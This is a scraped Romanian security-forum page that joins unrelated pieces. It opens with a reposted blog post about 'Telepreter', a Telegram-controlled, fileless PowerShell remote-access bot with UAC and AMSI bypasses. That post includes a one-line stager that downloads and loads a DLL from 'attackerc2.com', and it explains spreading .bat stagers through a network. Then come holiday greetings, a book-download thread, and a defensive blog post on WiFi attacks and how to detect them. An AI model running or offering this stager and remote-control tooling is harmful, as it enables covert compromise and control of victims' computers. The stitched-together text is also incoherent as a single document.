Leaderboard

Introduction In this post I will share some experience I had while working on a project named Telepreter. Telepreter is a PowerShell Runspace that uses Telegram bot API as transport and communications and C# DLL reflection to stay in-memory. So you can control your shells with a Telegram group and a single bot. Even further, I tried to add my favorite tools into it. So it has builtin AMSI and UAC bypasses from my earlier blog posts and some other excellent tools that I like very much like PowerView and PowerPreter. Side-Note: This is just a PoC, and an idea that I wanted to make it happen. I do not intend to develop further into it. Building a Telegram Bot with PowerShell execution capabilities So I decided to build a Telegram bot, capable of remote controlling a Windows computer. But more importantly that I wanted it fileless, so I chose using C# + PowerShell again, so we can operate in-memory and not rely at all with disk. Telegram API choice I researched some libraries in C# that might suit my need, and found one that had all the functionalities that I wished for in this repository; After compiling the code, I had a Telegram.Bot.dll and NewtonSoft.dll which are dependencies. Initial problems I had to work out with loading these DLL’s in a manner that would not drop anything on disk. So I resorted to Reflection (again…). Compressing and obfuscating all the DLL code into a base64 string constant value, I am able create a function that can load this assemblies in memory so we won’t have any exception when Telegram API functions are invoked. Crafting a small fileless Powershell stager payload To start a new bot instance on our victim, all it needs to be executed is the following line in PowerShell: [Reflection.Assembly]::Load((iwr attackerc2.com/telepreter.dll).Content)/[Telepreter.Agent]::Load();[Telepreter.Agent]::new().Start() Which in turn, I developed and integrated into the bot a function to create a stager payload. This way, an attacker can create .bat which could be used to infect more computers inside the network or spawning elevated bot instances (more on this later) Core functionalities How to control the bot To execute a command, simply type /bot:BOT_ID /shell PowerShellCommandHere PS: Dont worry about output size. The bot will send 200 lines once a second, so every output is sent to you! How to download files To download a file, simply type /bot:BOT_ID /download C:\windows\system32\license.rtf and Bot will send this file in group using Telegram file upload API! How to Port Scan with it! It is also useful for Recon, too! There is a sightly modified version of Invoke-Portscan from Nishang pack. No need to do fancy pivoting tricks to scan the internal network! How to bypass UAC with it! Check how I bypassed UAC in a Lab computer that was infected with it! In the above picture, I created a .bat stager that resided in the user temporary folder. This tiny stager will fetch the DLL using the supplied URL and then use reflection to load all dependencies and start the main function of the bot. Looking the picture above, it is possible to observe that a new instance of a bot has started. And the Administrator flag is set to True, which means this is an elevated session and we can use post-exploitation tools like Invoke-Mimikatz or others that require elevated privileges to work. To avoid having problems with multiple instances, never stay with more than one active session. Conclusion and Code This concludes the demonstration of this fun project I was working for a few days. Feel free to dig into it as much you want to. Probably a lot of people are going to say that it is crappy code… but it really is! I am no professional programmer. It is just an demonstration of how something like that could work. Of course that there are a ton of better ways of doing it. So feel free to do it if you like! To get access to the source-code: Link To start your own bot Just replace the following values in the code: Have fun. Best regards, zc00l. Source https://0x00-0x00.github.io/tools/2018/12/10/Pwning-Computers-using-Telegram-bot-API.html

"On 11/25/2017 at 6:12 PM, adineamtu01 said:" Atentie la data. De ce aladin vrei sa descarci 10000 de carti odata? Anyway... https://archive.org/ Asta e, pe departe, cea mai buna sursa pe care o stiu eu. Am gasit pana si "Introducere in algoritmi" de Thomas H Cormen, carte care costa peste 500 de ron, in limba romana, full.

Lamultzani! http://rstelion.cf/

Buna seara.La multi ani! Va rog sa imi spuneti cum sa procedez sa descarc acele 10000 de carti..si respectiv cum pot descarca cele doua carti ale lui Igor Bergler.Va multumesc.

https://www.youtube.com/watch?v=OZxeZSJ4PlU La multi ani tovarasi colegi de forum!

La multi ani!

@ARUBA @aismen @alexandudanca acest thread a fost deschis cu scopul de a ne ura un La Multi Ani cu ocazia noului an , si doresc s-a rămână asa .

Ca idee, daca te ajuta iti pot da exemplul meu. Eu am inceput sa invat networking acum ceva timp si mi s-a zis ca mi-ar trebui matematica. Nu neg, ai nevoie de ceva matematica insa aceea este una simpla si practic o inveti inotand prin teme de networking. Tind sa cred ca acela este si cazul tau. Nu te apuca sa inveti matematica doar pentru ca vrei sa inveti baze de date. Este ca si cum ai invata sa fii un mecanic bun pentru ca vrei sa fii sofer pe tir. Daca esti destul de pasionat, totul vine de la sine. Si matematica, si bazele de date, si betia de dupa un proiect reusit:P

La multi ani!

La multi ani si la multi bani!

La multean hecarilor!

La multi ani !!

Bemveu fa

Source: https://tls13.ulfheim.net/ Via: Oarecum conex:

https://explainshell.com/

Common WiFi Attacks And How To Detect Them Posted on September 19, 2017 in wifi, security I'm talking about DFIR (Digital Forensics and Incident Response) for WiFi networks at DerbyCon 2017 and will be releasing nzyme (an open source tool to record and forward 802.11 management frames into Graylog for WiFi security monitoring and incident response) soon. Note that I will simplify some of the 802.11 terminologies in this post. For example, I'll talk about "devices" and not "stations, " and I'll not use the term "BSS" for "networks." The Issue With 802.11 Management Frames The 802.11 WiFi standard contains a special frame (think "packets" in classic, wired networking) type for network and connection management. For example, your computer is not actively "scanning for networks" when you hit the tray icon to see all networks in range, but it passively listens for so-called "beacon" management frames from access points broadcasting to the world that they are there and available. Another management frame is the "probe-request" ("Hi, is my home network in range?") that your devices are sending to see if networks they connected before are in range. If such a network is in range, the relevant access points would respond with a "probe-response" frame ("Hi, yes I'm here! You can connect to me without waiting for a beacon frame.") The problem with management frames is that they are completely unencrypted. This makes WiFi easy to use because, for example, you can see networks and their names around you without exchanging some key or password first, but it also makes WiFi networks prone to many kinds of attacks. Common Attacks Explained Sniffing Traffic Virtually all WiFi traffic can be sniffed with adapters in monitor mode. Most Linux distributions support to put certain WiFi chipsets into this special mode that will process all traffic in the air and not only that of a network you are connected to. Everyone can get WiFi adapters with such a chipset from Amazon, some for less than $20. Encrypted networks will also not really protect you. WEP encryption can be cracked in a matter of minutes and even WPA2-PSK is not secure if you know the passphrase of a network (for example, because it's the office network and you work there, of because the local coffee shop has it written on the door) and can listen to the association process of the device. This works because the device-specific encryption between you and the access point uses a combination of the network passphrase and another key that is publicly exchanged (remember, management frames are not encrypted) during the association process. An attacker could force a new authentication process by spoofing a deauthentication frame that will disconnect your device for a moment. (more on that below) Detecting Sniffers Sniffing traffic is passive and cannot be detected. As a user, consider all WiFi traffic on open or closed to be public and make sure to use encryption on higher layers, like HTTPs. (Really, you should be doing this anyways, in any network.) Brute-Forcing Access Like any other password, passphrases for wireless networks can be brute-forced. WEP can be cracked by analyzing recorded traffic within minutes and has been rendered useless. For WPA secured networks you'd need a standard dictionary attack that just tries a lot of passwords. Detecting Brute Force Attacks Brute-forcing by actually authenticating to an access point is extremely slow and not even necessary. Most brute force cracking tools work against recorded (sniffed) WiFi traffic. An attacker could just quietly sit in the car in front of your office, recording traffic for some time and then crack the password at home. Like sniffing, this approach cannot be detected. The only protection is to use a strong password and to avoid WEP. Jamming The obvious way of jamming WiFi networks would be just to pump the relevant frequencies full of garbage. However, this would require fairly specialist equipment and maybe even quite some transmitting power. Surprisingly, the 802.11 standard brings a much easier way: Deauthentication and disassociation frames. Those "deauth" frames are supposed to be used in different scenarios, and the standard has more than 40 pre-defined reason codes. I selected a few to give you an idea of some legitimate use-cases: Previous authentication no longer valid Disassociated due to inactivity Disassociated because AP is unable to handle all currently associated STAs Association denied due to requesting STA not supporting all of the data rates in the BSSBasicRateSet parameter Requested from peer STA as the STA is leaving the BSS (or resetting) Because deauth frames are management frames, they are unencrypted, and anyone can spoof them even when not connected to a network. Attackers in range can send constant deauth frames that appear to come from the access point you are connected to (by just setting the "transmitter" address in the frame) and your device will listen to that instruction. There are "jammer" scripts that sniff out a list of all access points and clients, while constantly sending deauth frames to all of them. Detecting Jammers A tool like nzyme (to be released - see introduction) would sniff out the deauth frames, and Graylog could alert on unusual levels of this frame subtype. Rogue Access Points Let's talk about how your phone automatically connects to WiFi networks it thinks it knows. There are two different ways this can happens: It picks up beacon frames ("Hi, I'm network X and I'm here.") of a network it knows and starts associating with the closest (strongest signal) access point. It sends a probe-request frame ("Hello, is an access point serving network X around?") for a known network and an access point serving such a network responds with a probe-response frame. ("Hello, yep I'm here!") Your phone will then connect to that access point. Here is the problem: Any device can send beacon and probe-response frames for any network. Attackers can walk around with a rogue access point that responds to any probe-request with a probe-response, or they could start sending beacons for a corporate network they are targeting. Some devices now have protections and will warn you if you they are about to connect to a network that is not encrypted but was previously encrypted. However, this does not help if an attacker knows the password or just targets an unencrypted network of your coffee shop. Your phone would blindly connect, and now you have an attacker sitting in the middle of your connection, listening to all your communications or starting attacks like DNS or ARP poisoning. An attacker could even show you a malicious captive portal (the sign-in website some WiFi networks show you before they'll let you in) to phish or gather more information about your browser. Take a look at a miniaturized attack platform like the famous WiFi Pineapple to get an idea of how easy it is to launch these kinds of attacks. Rogue access points are notoriously hard to spot because it's complicated to locate them physically and they usually blend into the existing access point infrastructure quite well - at least on the surface. Here are some ways to still spot them using my to-be-released tool nzyme and Graylog: Detecting Rogue Access Points Method 1: BSSID whitelisting Like other network devices, every WiFi access point has a MAC address that is part of every message it sends. A simple way to detect rogue access points is to keep a list of your trusted access points and their MAC addresses and to match this against the MAC addresses that you see in the air. The problem is that an attacker can easily spoof the MAC address and, by doing that, circumvent this protective measure. Method 2: Non-synchronized MAC timestamps It is important that every access point that spawns the same network has a highly synchronized internal clock. For that reason, the access points are constantly exchanging timestamps for synchronization in their beacon frames. The unit here is microseconds, and the goal is to stay synchronized within a delta of 25µs. Most rogue access points will not attempt to synchronize the timestamps properly, and you can detect that slip. Method 3: Wrong channel You could keep a list of what channels your access points are operating on and find out if a rogue access point is using a channel your infrastructure is not supposed to use. For an attacker, being detected by this method is extremely easy: Recon the site first and configure the rogue access point to only use already used channels. Another caveat here is that many access points will dynamically switch channels based on capacity anyways. Method 4: Crypto drop An attacker who does not know the password of an encrypted network she targets might start a rogue access point that spins up an open network instead. Search for networks with your name, but no (or the wrong) encryption. Method 5: Signal strength anomalies There are many ways to spot a rogue access point by analyzing signal strength baselines and looking for anomalies. If an attacker sits on the parking lot and is spoofing one of your access points, including its MAC address (BSSID), it will suddenly have a change in the mean signal strength because he is further away from the sensor (nzyme) then the real access point. What's Next? I will share another post with examples on how to detect these attacks using nzyme and Graylog soon. For updates, make sure to follow me on Twitter or to subscribe to the blog. Written By Lennart Koopmann Follow me on Twitter or subscribe to the blog. Sursa: https://wtf.horse/2017/09/19/common-wifi-attacks-explained/

20 to 13. Adica ora unu fara 20 de minute. 1 <= h <= 12